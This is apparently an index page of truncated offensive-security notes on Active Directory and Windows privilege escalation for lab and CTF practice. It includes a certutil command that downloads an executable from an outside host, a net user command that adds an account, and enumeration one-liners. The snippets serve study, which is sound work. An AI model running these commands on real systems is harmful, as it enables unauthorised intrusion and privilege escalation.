Explanation The Kerberos authentication protocol used by Microsoft is adopted from the Kerberos version 5 authentication protocol created by MIT and has been used as Microsoft’s primary authenticat...

In order to exploit a PATH Hijacking we need to identify two things: 1) That the script can be executed on another user’s context 2) There is a missing relative path on a command or on a libra...

LLMNR (Link-Local Multicast Name Resolution) What is LLMNR? Link-Local Multicast Name Resolution. Used to identify hosts when DNS fails to do so. Previously known as NBT-NS. The main drawb...

Sharphound.exe First upload Sharphound to the system and then run the following commands from a folder where you can write as it will download a .zip file: # For SharpHound.ps1 (each line is a comm...

#Note It is possible that sometimes you need to use the host domain (e.g. sizzle.htb) NTPDATE ntpdate 10.10.11.102 RDATE rdate -n 10.10.11.102 DATE It is also possible to set the date “manually” ...

User create If we are able to create a user it is as simple as using the net.exe windows utility: net user shuciran shucir4n /add Add user to a group If there is a group in the domain with some pr...

Another interesting attack vector that can lead to privilege escalation on Windows operating systems revolves around unquoted service paths. We can use this attack when we have write permissions to...

Even while logged in as an administrative user, the account will have two security tokens, one running at a medium integrity level and the other at high integrity level. UAC acts as the separation ...

certutil.exe -urlcache -f http://10.0.0.5/40564.exe C:\Windows\Temp\bad.exe Example: [[Forest#^8fde0e]] # Dump general information certutil -dump # Dump information about certificate authority ce...

System information systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" systeminfo | findstr /C:"sistema" #Español Installed updates wmic qfe get Caption, Description Installed ...